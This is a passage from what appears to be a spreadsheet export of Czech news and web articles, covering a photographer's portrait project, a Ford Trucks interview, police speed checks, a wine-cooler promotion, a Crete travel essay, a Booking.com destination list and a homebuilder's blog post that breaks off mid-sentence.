mentálně retardovaný a přezdívá se mu král poutí ale ten do mého konceptu nezapadá. Je sice místní postavičkou, ale nepodílí se na kulturním dění. Mám ho ale rád, koupím mu pivo a pokecáme spolu. Vždy mě zdraví slovy nazdar foťáku,“ podotkl liberecký fotograf. Na projektu pracuje průběžně a za tu dobu se mu podařilo nashromáždit kolem šesti desítek portrétů. V nejbližší době má v plánu vyfotit postaršího pána, který převážně v centru města hraje na flétnu, a to už od devadesátých let minulého století. „S portrétovanými nijak nemanipuluji, nechávám je volně stát v civilním postoji, svítím jednoduše, tak aby vynikla jejich osobnost. Album nebude nikdy úplné. Stále se doplňuje. Mnohé, kterých si vážím, jsem nestihl nafotografovat a mnozí z vyfotografovaných už nejsou mezi námi, tak na ně nezapomeňme,“ zdůraznil Pikous . play_fill Liberecko V budoucnu by rád z hotových portrétů sestavil buď fotoknihu či katalog a vydal samonákladem. A jak sám přiznal, projekt plyne ve vlnách. Někdy se zadaří udělat novou fotografii, jindy to odkládá. Už se mu stalo, že focení odložil a pak už vybraného člověka nemohl nafotit kvůli úmrtí. „Zároveň jsem začal přemýšlet o tom, kdo je vůbec liberecký člověk. Co nás všechny spojuje, symbolizuje,“ svěřil se. Šimon Pikous zároveň působí i na Liberecké škole fotografické . Aktuálně připravuje výstavu Započteno V., jejíž vernisáž se uskuteční první listopadový den v Krajské vědecké knihovně v Liberci . Výstava zahrnuje zejména fotografie, které vznikly převážně jako klauzurní práce. Studenti předvádí výsledky své tvorby po absolvování ročníku. Expozice je doplněna o další úkoly z kurzu, které nabízejí širší pohled na obsah dálkového studia Tvůrčí fotografie a grafiky. „Naše škola se bude prezentovat i na výstavě Prague Photo, jejíž šestnáctý ročník se uskuteční od 19. do 24. listopadu v Clam-Gallasově paláci. Je to pro nás prestiž, že budeme její součástí,“ dodal Šimon Pikous . Šimon Pikous (*1970) je vyučeným fotografem, později se živil jako prodavač knih, pracovní terapeut duševně nemocných v organizaci Fokus MYklub a tajemník Jizersko-ještědského horského spolku. Absolvoval na magisterském studiu na Institutu tvůrčí fotografie při Slezské univerzitě v Opavě . V současnosti pracuje jako profesionální fotograf, kromě toho učí na Střední škole oděvního designu v Liberci a na Slezské univerzitě v Opavě (obor Audiovizuální tvorby). Na počátku jeho fotografické tvorby je patrný vzor otce Jana , fotografa proslulého především montážemi a zátišími. Na přelomu tisíciletí se jeho projev přiklonil k jiným tématům a formám. Má v oblibě romantismus, dekadenci i novou objektivitu. Samostatné fotografické výstavy měl například v Městském muzeu v Blatné , Galerii M v Milevsku, Experimentálním studiu v Liberci a liberecké Malé výstavní síni, pražském PENklubu, Ambrožově galerii v Hradci Králové , Aréně komorní scéně v Ostravě , Poslanecké sněmovně Parlamentu České republiky , budově Veřejné ochránkyně práva v Brně , Galerii Caesar v Olomouci , Českém centru München, v liberecké synagoze. V roce 2015 mimo jiné vystavoval v Severočeském muzeu v Liberci a Oblastní galerii v Liberci. Mimo to se účastnil dalších kolektivních výstav. V roce 2016 získal ocenění Czech Press Photo v kategorii Portrét a byl i publikován na výstavách Czech Press Photo 2017 a 2019. V roce 2020 byly dvě jeho fotografie oceněny v Top 25 na Imago 2020 Je zastoupen v soukromých sbírkách a sbírkách Severočeského muzea v Liberci , Muzea umění v Olomouci a Albin Polasek Museum ( USA ). Zdroj: Liberecká škola fotografická Lambrechtova meteorologická budka prochází obnovou. Tu má na starost umělecký kovář a restaurátor Václav Nikendey. | Video: Jiří Louda Autor: Jiří Louda Autor Jiří Louda</t>
  </si>
  <si>
    <t>13750</t>
  </si>
  <si>
    <t>20241101_419_3242573843_e82cf9fbac9b00fd0845.html</t>
  </si>
  <si>
    <t>e82cf9fbac9b00fd0845</t>
  </si>
  <si>
    <t>Vyvíjíme pro zákazníky vozidla, která je převezou do budoucnosti</t>
  </si>
  <si>
    <t>Vyvíjíme pro zákazníky vozidla, která je převezou do budoucnosti Murat Bakis je ostříleným lídrem v automobilovém průmyslu a během své dlouholeté kariéry u společnosti Ford Motor Company prošel různými funkcemi od výroby, vývoje produktů až po poprodejní servis. Na konferenci SpeedCHAIN byl účastníkem panelové diskuse „Inovativní mobilita: Připraven na změnu?“ Váš životopis obsahuje úctyhodnou řádku pracovních pozic napříč společností Ford Motor Company . Na co se soustředíte právě teď? Prošel jsem celou řadou pozic od vývoje až po prodej, a to včetně krátkého pobytu na personálním úseku. Tyto zkušenosti mi hodně pomohly lépe porozumět tomu, co naše firma dělá a jak se na její aktivity dívají jednotlivá oddělení. Všichni to známe: každé oddělení se na věc dívá z trochu odlišného úhlu, cíl bychom ale měli mít všichni stejný. V současnosti působím jako výkonný ředitel Ford Trucks Central Europe Operations. Náš region pokrývá nejen Českou republiku a Slovensko , ale také země, jako je Maďarsko , Chorvatsko , Slovinsko nebo Srbsko . Česko je zde pro nás největším trhem, a proto máme základnu v Průhonicích u Prahy . Obsáhnout tak široký region musí být náročné. To je pravda, má práce znamená intenzivní cestování. Za rok nařídím kolem 40 000 km a mám díky tomu ze silnic podobné zkušenosti jako uživatelé našich produktů, řidiči nákladních vozidel. Dost najezdím i v rámci České republiky , máme tu mimo jiné osm servisních partnerů s hlavním servisním centrem ve Strančicích . Celkem firma globálně disponuje více než 350 servisními místy pro naše partnery. V současnosti Ford Trucks zastoupení v 50 různých zemích, všude se přizpůsobujeme místním podmínkám a potřebám. Tento do sítě přibylo Nizozemsko , nedávno také importér ze Švýcarska , v budoucnosti uvítáme skandinávské země, Anglii a Irsko . Pocházíte z Turecka , ve kterém má Ford Trucks výrobní závod… Společnost Ford Trucks navazuje na více než stoletou historii výroby automobilů, která začala v Americe modelem T. Vozidla Ford se stala globálním pojmem. V Turecku se sortiment nákladních vozidel Ford Trucks včetně lehkých a středních komerčních vozidel a těžkých nákladních vozidel vyrábějí na bázi licence už od roku 1959. Stavíme tedy na 65 letech zkušeností s vývojem a výrobou. V panelové diskusi na konferenci SpeedCHAIN jste ovšem nehovořili o historii, ale o budoucnosti. Jak se tedy dívá Ford Trucks do dalších let a desetiletí? Ve společnosti Ford Trucks dobře víme, že kromě rozšiřování své sítě servisů a importérů a budování dlouhodobých zákaznických vztahů musíme investovat do budoucnosti i v dalších oblastech. Chceme být skutečným globálním hráčem, který přispívá k rozvoji moderní dopravy a logistiky v různých odvětvích a regionech. K tomu patří i nové technologie: vozidla s nulovými nebo nízkými emisemi, jako je dieselový motor Gen2, motory schválené pro využívání alternativních paliv jako HVO nebo vozidla poháněná elektřinou či vodíkem. S našimi novinkami a technologiemi, jako je například řada F Line E nebo vodíkový spalovací pohon Ecotorq H2, který funguje podobně jako klasický naftový motor a je alternativou k elektrickému motoru, nebo s vozidly využívajícími vodíkové palivové články, se mohli letos seznámit návštěvníci hannoverského veletrhu. Jaký je ohlas u zákazníků? Právě začíná prodej vozidel s pohonem na BEV, a vím, že tuto technologii je už připraveno zakoupit mnoho našich zákazníků. Máme dobrý ohlas na všechny novinky, vždyť je také vyvíjíme v úzké spolupráci s našimi zákazníky. Technologický rozvoj ovšem nekončí u pohonu nebo designu kabiny, při vývoji vozidel zohledňujeme i nejnovější předpisy například v oblasti bezpečnosti řidičů, ve vašem případě předpisů EU. Zajímavým prvkem je například čidlo, které rozpozná, že řidič požil alkohol a „odmítne“ nastartovat. Využíváme také integrovanou technologii, aby na základě nestandardních zvuků nebo vibrací rozpoznala jakékoli nepravidelnosti a potencionální problémy v chodu vozidla a doporučila údržbu ještě předtím, než dojde k poruše. Vše směřuje k tomu, aby naši zákazníci měli pro své podnikání k dispozici ta nejkvalitnější vozidla a mohli je využívat co nejefektivněji a co nejdéle, a aby případné problémy byly co nejrychleji vyřešeny. K dispozici proto mají nejen naše servisní centra a speciální programy údržby, ale hlavně centrum péče o zákazníky, jež jim připraví řešení střižená na míru jejich potřebám. Přihlížíte při vývoji i k požadavkům a potřebám řidičů? Samozřejmě, jsme s řidiči v pravidelném kontaktu při různých workshopech a nasloucháme jejich přáním a představám. Do našich kamionů integrujeme nejen nejnovější technologie, které optimalizují spotřebu a zvyšují bezpečnost, ale také prvky, které přispívají k lepšímu pohodlí řidičů. Vždyť kabina je v podstatě jejich domovem a oni nejlépe vědí, co jim usnadní život. Naši designéři věnují spoustu času a energie ergonomickému designu a chytrému řešení nejen palubní desky, ale také spacích a úložných prostor pro řidiče. Jak byste tedy shrnul nabídku Ford Trucks? Celkově bych řekl, že naše nákladní vozidla přinášejí zákazníkům a uživatelům dlouhou životnost, technologické novinky, a také ekologičnost. To z nás dělá významného hráče na trhu a jsme připraveni rychle reagovat na měnící se svět kolem nás tak, abychom klíčovým hráčem zůstali i do budoucna. Prostřednictvím naší „zákaznické kliniky“ pečlivě nasloucháme, shromažďujeme informace od majitelů firem, manažerů flotily i řidičů, a vyvíjíme nové technologie a vozidla, jež dovezou naše partnery do budoucnosti. Konference SpeedCHAIN se zaměřila právě na měnící se budoucnost logistiky a schopnost přizpůsobit se novým podmínkám. Kde vidíte nejdůležitější prostor pro změny a inovace? Řekl bych, že nejvýznamnějšími hnacími silami nejen na logistickém trhu jsou změny tržní poptávky, nové technologie a požadavek na udržitelný provoz. Pokud jde o poptávku, ohromný vliv na trh a spotřebitelská očekávání má rozvoj e-commerce. Logistické firmy čelí velkému tlaku na rychlost a spolehlivost dodávek. S tím souvisí i městská logistika a potřeba přizpůsobit se městskému prostředí. Hustota zalidnění měst se stále zvyšuje a „poslední míle“ je stále komplikovanější. To otevírá prostor inovacím, jako jsou autonomní vozidla, drony nebo elektrická nákladní jízdní kola, která se lépe vyhnou zácpám a zkrátí čas doručení na nezbytné minimum. Zmínil jste, že do nákladních vozidel integrujete nejnovější technologie. Jak mohou přispět k rozvoji logistiky? V poslední době do dodavatelských řetězců stále více pronikají pojmy, jako je automatizace, robotika a umělá inteligence. Například umělá inteligence může usnadnit lidem přijímat rozhodnutí v reálném čase – poskytne jim potřebné informace a nechá konečné rozhodnutí na nich. Pomůže s optimalizací tras, řízením zásob a sledováním zásilek. Automatizované sklady využívající robotické systémy a chytré senzory zlepší produktivitu a sníží chybovost zapříčiněnou lidským faktorem. Kvalifikované lidi pak využijeme tam, kde je to opravdu potřeba. Je zajímavé sledovat, jak velký dopad má na podnikatelské prostředí digitalizace, jež zaručuje nejen větší transparentnost a lepší řízení dodavatelských řetězců. Například Blockchain nabízí lepší bezpečnost a sledovatelnost a zajišťuje hladký posun zboží přes různé body dodavatelského řetězce. Tyto technologie hrají zásadní roli v řešení složitostí spojených s přeshraničním obchodováním, například s Velkou Británií po Brexitu. Diskuse nejen na mezinárodních konferencích se točí kolem udržitelných technologií a fungování firem. Jak se díváte na tento fenomén? Důraz na ochranu životního prostředí je středobodem budoucnosti evropské logistiky. Green Deal a stále přísnější ekologické předpisy tlačí firmy k přijímání zelenějších postupů a řešení. Patří sem již zmíněné elektrické a vodíkové motory, alternativní paliva a investice do snižování uhlíkových emisí. Řada firem testuje i multimodální dopravní řešení a zkouší propojit do svých řetězců železniční, vodní a silniční dopravu tak, abych vznikly ekologičtější dodavatelské sítě. To všechno pomáhá Evropské unii plnit své klimatické cíle. Domníváte se, že evropská legislativa snižuje konkurenceschopnost evropských logistiků? Nutnost pořizovat nové technologie a usilovat o nulové emise se přirozeně odráží ve vyšších celkových nákladech na vlastnictví, což má vliv i na konkurenceschopnost. Evropské vlády se alespoň částečně snaží tuto nevýhodu vykompenzovat různými incentivami – například nižšími cenami za využívání dálnic pro ekologická vozidla ve srovnání s vozidly na klasický dieselový pohon. Podle mě je ovšem přechod na bezemisní technologienevyhnutelný, i když bude pravděpodobně trvat déle, než byl původní cíl. Dieselové motory si ale ještě částečně zachovají svou roli zejména na delší vzdálenosti, protože prozatím není rozvinutá dostatečná síť dobíjecích stanic. Měnící se podmínky a zákaznické požadavky, rostoucí nároky na efektivitu a ekologii – mohou to logistické i jiné firmy vůbec zvládnout? Logistici budou možná muset kvůli ekologickým opatřením zvýšit ceny, což by logicky zvýšilo i celkové ceny mnoha produktů – jen málokterý spotřebitel si uvědomuje, že významná část ceny každého výrobku je tvořena právě náklady na logistiku. Ale zvládnout to prostě musí. Logistika byla vždycky pružná a schopná reagovat. Firmy budou muset využívat technologické inovace, respektovat požadavky na ekologii řešení a pěstovat si odolnost vůči měnícím se spotřebitelským očekáváním. My jim v tom pomůžeme tím, že budeme vyvíjet chytřejší, zelenější a efektivnější řešení pro dopravu a dodavatelské řetězce, která umožní požadavky trhu i legislativy splnit. Zdroj: LogisticNEWS Autor: Martin Rumler Autor person Martin Rumler Rubrika transition_slide Rozhovor s osobností</t>
  </si>
  <si>
    <t>44</t>
  </si>
  <si>
    <t>20241101_42_3264512947_fc61b3aae729ea8e09db.html</t>
  </si>
  <si>
    <t>fc61b3aae729ea8e09db</t>
  </si>
  <si>
    <t>Policisté měřili rychlost u Bezdězu. Řidiči si to tam hasili až 150 km/h</t>
  </si>
  <si>
    <t>Policisté měřili rychlost u Bezdězu . Řidiči si to tam hasili až 150 km/h Policejní radary zaznamenaly během čtyř hodin překročení dovolené rychlosti u 21 řidičů, naměřené hodnoty se většinou pohybovaly na devadesátce od 120 kilometrů výše. Dva řidiči jeli dokonce rychlostí 147 a 149 kilometrů za hodinu. „Posledním dvěma jmenovaným zadrželi policisté řidičský průkaz a jejich přestupek oznámili do správního řízení. V něm skončí i řidič, kterému naměřili 128 kilometrů v hodině a byl navíc pod vlivem alkoholu ,“ uvedla mluvčí českolipské policie Ivana Baláková. Mezi další prohřešky patřilo nebezpečné předjíždění v místech, kde ho značka zakazuje, nebo přes plnou čáru před horizontem. To policisté ocenili pětitisícovou pokutou. Někteří řidiči se také zapomněli připoutat bezpečnostním pásem. play_fill Českolipsko Dopravní policisté budou tomuto úseku věnovat zvýšenou pozornost i nadále. Silnici využívají ve větší míře obyvatelé Českolipska, kteří dojíždějí do zaměstnaní na směny do Středočeského kraje , proto je velmi frekventovaná. V minulosti zde došlo k několika velmi vážným nehodám s tragickými následky . Poslední se stala koncem července, kdy se u Obory střetl ve vysoké rychlosti volkswagen s dodávkou, ve které cestovala pětičlenná rodina. Na místě zemřel řidič dodávky a těžké zranění utrpěli jeho tři synové a manželka. Řidič volkswagenu podlehl svým těžkým zraněním později v nemocnici. Podle svědků právě on projížděl po silnici I/38 z Mladé Boleslavi na Českolipsko velmi riskantně, když u Obory vyjel do protisměru a smetl dodávku ze silnice. Podívejte se: Obchvat Svoru startuje. Stavba za půl miliardy zklidní dopravu v centru obce Obchvat Svoru startuje. Stavba za půl miliardy zklidní dopravu v centru obce, I/9, Svor, obchvat, stavba, ŘSD | Video: Ladislava Sdrzallek Autor: Petra Hámová Autor Petra Hámová</t>
  </si>
  <si>
    <t>6760</t>
  </si>
  <si>
    <t>3860</t>
  </si>
  <si>
    <t>20241101_420_3241922974_a7f1d488df444a96eda2.html</t>
  </si>
  <si>
    <t>a7f1d488df444a96eda2</t>
  </si>
  <si>
    <t>Novou generaci vinoték Liebherr skoro neuslyšíte. Vínu věnuje tu nejlepší péči</t>
  </si>
  <si>
    <t>Novou generaci vinoték Liebherr skoro neuslyšíte. Vínu věnuje tu nejlepší péči Uchovávání vína není jen otázkou správné teploty. Aspektů určujících kvalitu vinotéky je mnohem víc a Liebherr to ví, protože se jejich vývoji a výrobě věnuje už od roku 1980. Za více než čtyřicet let dovedl německý výrobce svou nabídku k dokonalosti po dílenské, technologické i designové stránce. Aktuálně rozšiřuje portfolio o 11 nových modelů v rámci řad Vinidor a Vinidor Selection, které s sebou přinášejí i některé zajímavé a praktické inovace. Značka Liebherr coby specialista na produkci chladicí a mrazicí techniky je právem považována také za špičku v oblasti řešení pro uchovávání vína . Od počátků v osmdesátých letech urazila firma dlouhou cestu – její dnešní nabídka obsahuje jednozónové, dvouzónové, a dokonce třízónové vinotéky, určené pro skladování, temperování i prezentaci vína . Všechny modely jsou nadále vyráběny v Německu a nejedná se o pouhé chladicí vitríny. I proto jsou často volbou someliérů a všech, kdo chtějí uchovat cenné lahve v bezpečí. Pokud jde o prémiové skladování vína , Liebherr by měl být pro vaše zákazníky jedinou volbou. Novinky v několika barevných provedeních Představované modely ve vestavném i volně stojícím provedení lze vybírat v designech SmartSteel, BlackSteel a GlassBlack, přičemž jejich interiér je vždy přizpůsoben vnější barvě. A to jak barvou zadní stěny, tak LED osvětlením, například světelným sloupem na vnitřním boku spotřebiče. Nejen kontrolovaná a přesně řízená teplota Maximální bezpečí uložení vína zajišťuje technologie Temp Protect Plus, která vnitřní teplotu kontroluje hned pomocí dvou čidel. Vnitřní mikroklima tak nepodléhá teplotním výkyvům, což je pro víno velmi důležité. Dvířka UV Protect Plus obsahují 3 skla se 3 vrstvami UV filtru, takže sluneční svit nemůže obsah lahví jakkoliv ohrozit. Nechybí možnost uzamknutí dvířek mechanickým, případně elektronickým zámkem (PIN kód). Nastavení teploty od +5 °C do +20 °C lze provést jednoduše na ovládacím panelu zapuštěném v čelní straně dveří. Menu zobrazené na displeji obsahuje všechny světové jazyky a nechybí ani čeština. Pokud displej nepoužíváte, zobrazuje neustále teplotu a vlhkost uvnitř vinotéky. Vybrané modely disponují navíc funkcí Humidity Control a relativní vlhkost v nich lze nastavit v rozsahu od 50 % po 80 %. U modelů bez této funkce najdete jednodušší variantu nazvanou Humidity Select, u níž volíte vlhkost ve 2 stupních. Důležitým prvkem pro udržování vnitřní vlhkosti je také šikovné příslušenství ve formě zásobníku na zachytávání kondenzátu. K vytvoření toho nejvhodnějšího prostředí přispívá i vyměnitelný uhlíkový filtr, samostatný pro každou teplotní zónu, a odpružení kompresoru minimalizující chvění. Opravdu praktická konektivita se SmartDevice Nové vinotéky jsou vybaveny nebo připraveny pro použití příslušenství SmartDevice, vyjímatelného modulu, který je umožní připojit k wi-fi síti, potažmo internetu. Z aplikace v chytrém telefonu pak lze kontrolovat či nastavovat vinotéky na dálku. Obdržíte také upozornění, pokud nedovřete dvířka. A to nejen na telefon. Spotřebiče spustí současně zvukový a světelný alarm. V případě výpadku elektřiny či kolísání vnitřní teploty vás o této situaci informuje aplikace. Nízká spotřeba i hlučnost Liebherr také zapracoval na snížení spotřeby svých vinoték, a to skutečně výrazným způsobem, jak se můžete přesvědčit ve specifikačních listech jednotlivých modelů. Většina výrobců na trhu nabízí tyto spotřebiče v energetické třídě G, zatímco u značky Liebherr je to třída F. Modely s plnými, tedy neprosklenými dveřmi se pyšní dokonce energetickou třídou E. Snížena byla také hlučnost, aby vinotéky nerušily ani při instalaci v obývacím pokoji. Další vylepšení Zastavit se musíme ještě u jedné novinky – vylepšených teleskopických roštů s automatickým dojezdem, které nyní obsahují desky FlexFit. U nich lze snadno nastavit dřevěné lišty a jejich rozteče, a tím je přizpůsobit každé lahvi. Dokonce lahvím velikosti magnum. Populárním prvkem v řade Vinidor Selection je exkluzivní a rafinovaná SommelierBoard, výsuvná police, která sofistikovaně prezentuje víno , sklenice, dekantér a příslušenství. Nejenže dobře vypadá, ale je i praktická při otevírání a servírování vína . Tabulku na konci článku pls vytípni z tiskového PDF/InDesignu z finální verze časopisu. www.liebherr.com Autor: Jakub Novák Autor person Jakub Novák</t>
  </si>
  <si>
    <t>341</t>
  </si>
  <si>
    <t>363</t>
  </si>
  <si>
    <t>20241101_421_3241831053_f0b46cdcc76a4d861a93.html</t>
  </si>
  <si>
    <t>f0b46cdcc76a4d861a93</t>
  </si>
  <si>
    <t>Tereza Horváthová: Nerokouros</t>
  </si>
  <si>
    <t>Tereza Horváthová : Nerokouros Nevím už, jak vznikla tahle rodinná tradice, vyrážet čas od času na výlety jen s mlhavou představou kam máš dojít, kudy máš jít a jak se máš vrátit domů. Asi se to nedá svést na nic jiného, než na nechuť něco plánovat, jelikož v tom našem monstrózním podniku, co jsme ze svého života vytvořili, už se nám moc nechce organizovat. Vyrážíme. Nahodile otevřený francouzský průvodce po okolí Chanii v domě zapůjčeném od bývalé nakladatelky, včera zvěstoval, že asi sedm kilometrů, v podhůří narůžovělých hor, které pozorujeme přes siluety vysokých lamp chaňského stadionu, je starý klášter a vyhlídka. Čtěte také Tereza Horváthová : Telefony Jméno toho místa jsem si přečetla nedbale a teď ho lovím v paměti na zastávce autobusu, který by nás tam měl dovézt. Asi to bude tady, Nerokouros… Ač to zní spíš jak nějaký bájný ještěr. Náhodně oslovení chodci kroutí hlavami nad názvem i možnou přítomností kláštera. Autobus číslo 33 nás proveze dlouhou periferií a vyklopí nás stanici za špitálem. Stojíme na malé silničce lemované obrovskými tújemi, za kterými začínají kilometry sadů oplocených jen nízkou kamennou zídkou. Jsou tři hodiny odpoledne, není tu nic než prach a vedro. Vyrážíme směrem k horám, i když cíl naší cesty zřejmě neexistuje. Stromy už vrhají stín. Oči i dech se pomalu přizpůsobily horku a v šedo-zeleno-rezavých odstínech začínají rozeznávat hojnost: avokádovníky obsypané dozrávajícími plody, trnité keře plné granátových jablek, fíky, čerstvé i ty suché, které se nevyužité válí pod stromy a pečlivě udržovaná zahrada plná salátů a lilků. Čtěte také Tereza Horváthová : Jablůňka Čtrnáctiletá Johanna odmítá jít dál, nechápe, co tu děláme. My také nechápeme. Za malou vápenkou roste ve srázu fíkovník, kořeny a kmen má hluboko pod námi a spleť větví složí složitou snovou korunu, ve které se mihne kočka… Horské stráně, pod kterými putujeme, jsou uschlé, tráva, byliny a kaktusovité trsy by se mohly každou chvíli vznítit. Občas přejede auto. Vcházíme do velké roztahané vesnice. Jsou tu jen nehezké domy postavené v posledních dvou dekádách, které většinou slouží k ubytování letních hostů, ale na chodníku, v zahradách i u silnice rostou manga, kaki, obří rudě rozkvetlé ibišky a stromy se žlutými plody, které chutnají jako rajče klonované fíkem. Ortodoxní klášter působí opuštěně, žádné pozůstatky středověku tu nevidíme. Autobus jede asi za dvě hodiny, dá-li se věřit jízdnímu řádu, vyhlídka je vysoko v horách. Děti dál než k mrazáku v supermarektu, odkud vytáhly mrňavé domácí nanuky, nedostaneme. Čtěte také Tereza Horváthová : Zastavený čas J. je ale už jako ohař na stopě, stoupá podél hřbitova po drolící se betonové cestě k původní vesnici. Cestička se zužuje a kroutí a ocitáme se uprostřed rozvalin bývalé vesnice postavené terasovitě ve stráni. Před padesáti lety tu ještě stála, některé obvodové zdi ještě drží, jiné už jsou v rozvalinách. Prorůstají jimi trsy šalvěje, horského hojníku a mladé fíky. V některých zdech ještě visí sluncem a větrem vysoušené zelené a modré dveře na jeden pant, je tu i pár domů, které ještě stojí, jsou zavřené na zámek, ale střecha už propadává. Na zemi se válí kropenka na svěcenou vodu zaprášená pískem a vyžraná měděnkou. Před námi se otevřel pohled na obrovský přístav, do kterého možná tihle vesničané denně chodili po své práci. Odkud sem dostali vodu, když tu žili celá staletí, není jasné. Čtěte také Tereza Horváthová : Rande Děti nás nakonec najdou a propadnou stejné hře jako my, přeskakují a prolézají labyrintem uliček a zdí a snaží se vyšplhat co nejvýš… Na úplném vrcholu za dvojitým elektrickým drátem stojí vila, kterou tu museli postavit před třiceti lety. Je stejně prázdná jako domy dole a připomíná, že zanikání někdy může být rychlejší, než si představujeme. Cestou dolů si všimneme rozvalin středověkého kláštera, který leží u hlavní silnice daleko od vsi, žádná cesta k němu nevede. Kluk, kterého se ptáme, odkud jede autobus, anglicky neumí, a i když se snaží, nakonec jen neurčitě mává rukou k přístavu. Na krajnici úzké silničky se válejí odpadky a dlouhá gumová hadice. Cestou nás praví Kréťané obdarují obrovským trsem fialového hroznového vína . Čtěte také Tereza Horváthová : Den S. U autoopravny a marketu na konečné autobusu číslo 25 postává parta mladých mužů s vlasy ulízlými brilantinou, zvou nás ke stolu, vyzvídají, hostí nás… Život se děje tady a teď. Mluvíme o práci pro instalatéry a holiče. Smějeme se. Na malý okamžik se spřátelíme. Život a zanikání, minulost naskládaná ve vrstvách, kterou tu nikdo nevidí, krása, hojnost, prach, odpadky a srdečná blízkost těch lidí jihu a slunce, které i v sedm hodin večer hřeje. Pro to jsme si sem přišli cestou, po které nikdo nechodí, do místa, které nikoho nezajímají. Johanna nám už odpustila. Autor: Tereza Horváthová Autor person Tereza Horváthová Rubrika transition_slide Ranní úvaha</t>
  </si>
  <si>
    <t>13000</t>
  </si>
  <si>
    <t>12280</t>
  </si>
  <si>
    <t>20241101_422_3241819822_636890513e75d098f91e.html</t>
  </si>
  <si>
    <t>636890513e75d098f91e</t>
  </si>
  <si>
    <t>Věštci z&amp;nbsp;Booking.com aneb jaké destinace budou příští rok trendy</t>
  </si>
  <si>
    <t>Věštci z&amp;nbsp;Booking.com aneb jaké destinace budou příští rok trendy Chcete se podívat někam, kde ještě nebyla půlka národa, ale nemusí to být hned deštný prales? Tak se nechte inspirovat platformou na rezervaci ubytování Booking a jejich žebříčkem na příští rok. Máte po krk Řecka a Ibizi? O Chorvatsku ani nemluvě. Chcete se podívat někam, kde ještě nebyla půlka národa, ale nemusí to být hned deštný prales? Tak se nechte inspirovat platformou na rezervaci ubytování Booking a jejich žebříčkem na příští rok. Villajoyosa – Španělsko Začneme klasikou. Městečko na pobřeží Costa Blanca (Bílé pobřeží). Paella, písčité i oblázkové pláže, podvečerní procházky po promenádě a posezení u míchaného drinku, to vše nabízí toto vskutku pestré letovisko. Pokud se obáváte, že zde uslyšíte hodně češtiny či jiných slovanských jazyků, pak vás uklidním. Villajoyosu si oblíbili především turisté z Dánska a Norska . Tromsø - Norsko Teploty stoupají, někomu horko i v létě vyloženě vadí. Stoupá zájem o norská města i přírodní krásy. Víte, že vánoční strom vztyčený každoročně na Trafalgar Square v Londýně pochází právě z Norska ? I Britové vědí, že se dá v Norsku najít krása, tak proč by si to měl český Honza nechat ujít. Tignes – Francie Dívali jste se letos v létě na sportovní přenosy z Olympiády a učarovala vám šarmantní Francie ? Tato země vína , sýrů a elegance není jen Paříž . Podle statistik Bookingu je už nějaký čas oblíbené lyžařské středisko Tignes. Hlavně pamatujte: víno si dopřejte, až se vrátíte ze svahu, abyste se vrátili v jednom kuse. Houston – USA „ Houstone , máme dovolenou.“ Tuhle variaci známé filmové hlášky budete moci pronést, jakmile vystoupíte z letadla na letišti nejlidnatějšího města Texasu . Vyjma pověstného Centra pro Vesmírný Výzkum může návštěvník navštívit i muzea, zoologickou zahradu a ochutnat kovbojskou baštu. San Pedro de Atacama – Chile Tortilly a burrita v Houstonu jsou sice chutné, ale chcete tu echt latinsko-americkou kuchyni? Nebo jste spíš přírodofil toužící spatřit poušť? Atacama se nemůže chlubit bujnou vegetací, to však ani v nejmenším neznamená, že nemá co nabídnout. Trieste – Italy Itálie . Kdo by neznal Itálii . Ale znáte všechny kouty Itálie ? Sanya – Čína Lidnatá, kontroverzní, s dlouhou tradicí. Myslím, že i profesionální sinolog by potřeboval tři životy, aby mohl prohlásit, že už o této zemi ví vše, co se dá, ale proč nepoznat aspoň ždibec toho, co světáci. Naha , Okinawa - Japonsko Technologický pokrok, anime a půvabná děvčata. Každého si tato země získala něčím jiným. Jisté je, že značná část lidí ze západu smýšlí o Japonsku poměrně pozitivně. Až tak, že jazykové školy a aplikace na výuku cizích jazyků hlásí nárůst zájemců o učení se právě japonštiny. Skvělý čas využít nově nabyté znalosti v praxi, nemyslíte? Joao Pessoa – Brazílie Dost bolo přírody, vyrážíme do města! Město dříve známé jako Paraíba je takovou brazilskou Prahou , aspoň co se počtu obyvatel týče. Ale rozdílů se také najde pár. Například tak skvostnou písečnou pláž jako je Cabo Branco v Praze určitě nenajdete. Willemstad – Curaçao Ostrovní království Curaçao je zlatým hřebem našeho seznamu, pokud rádi objevujete skryté poklady. Relativně skryté. Obliba tohoto ostrůvku v poslední době stoupá. https://news.booking.com/from-seaside-sanctuaries-to-cool-culture-capitals-bookingcom-reveals-2025s-trending-destinations/</t>
  </si>
  <si>
    <t>20241101_423_3242072553_9c542b9bc4573d21216d.html</t>
  </si>
  <si>
    <t>9c542b9bc4573d21216d</t>
  </si>
  <si>
    <t>Bourací práce a stavba sklepu</t>
  </si>
  <si>
    <t>Bourací práce a stavba sklepu Autor: Roman (3 příspěvky) 0 komentářů Příspěvek stavebníka Při čekání na vydání stavebního povolení jsem se pustil do odstranění přístavků a stavby sklepa. Konečně mám kde chladit pivo ! Přípojky a demolice Zatímco probíhaly práce na projektové dokumentaci, zahájil jsem na jaře 2022 demolice přístavků a verandy. Než jsem tyto práce začal, vyřešil jsem s poskytovateli energií jejich odpojení. V místě budoucího oplocení jsem vystavěl antoníčka na el. přípojku a elektroměr a nechal do něj elektriku z domku přepojit. V antoníčku je na zádech rozvaděče namontovaný staveništní rozvaděč. Bylo zrušeno nadzemní vedení, nová přípojka je stažená ze sloupu zemí. Nechal jsem si poradit, co přesně napsat do žádosti. Cena za novou přípojku je zásadně odlišná od přeložení! Plynoměr jsem nechal demontovat, přípojku jsem nerušil, i když s vytápěním plynem spíš nepočítám. Vodoměr byl taky zdemontován a vodovodní přípojka zkrácena a zaslepena mimo plánované základy. Vodoměr bude nově v technické místnosti. Na pozemku je studna, takže vodu na stavbu mám a platit navíc stočné za namíchání malty se mi nechce. Přístavky byly v dezolátním stavu, měly propadlou střechu a několik let do nich zatékalo. Risknul jsem bourání aniž bych to hlásil úřadům. Z uličního pohledu jsem byl schovaný před všetečnými pohledy za domkem. Zdivo z pálených cihel bylo vystavěno na hliněnou maltu pouze s přídavkem vápna, takže se dalo celkem bez problémů rozebrat. Očištěné cihly jsme uložili na pozemku k pozdějšímu využití, na vyvezení zbylé sutě byl objednán kontejner. Sklep - zdivo Pod přístavky bylo podsklepení s nefunkční vodárnou a pavouky. Po konzultaci s projektantem jsem ho z důvodu nevyhovující stavební výšky a stavu taky zdemoloval. Protože legislativa umožňuje za určitých podmínek (které splňujeme) postavit u stávajícího RD sklep i bez povolení, pustil jsem se o prázdninách do jeho stavby. V tomto okamžiku už jsem měl finální verzi projektové dokumentace o kterou jsem se mohl opřít. I když ještě nebylo vydáno stavební 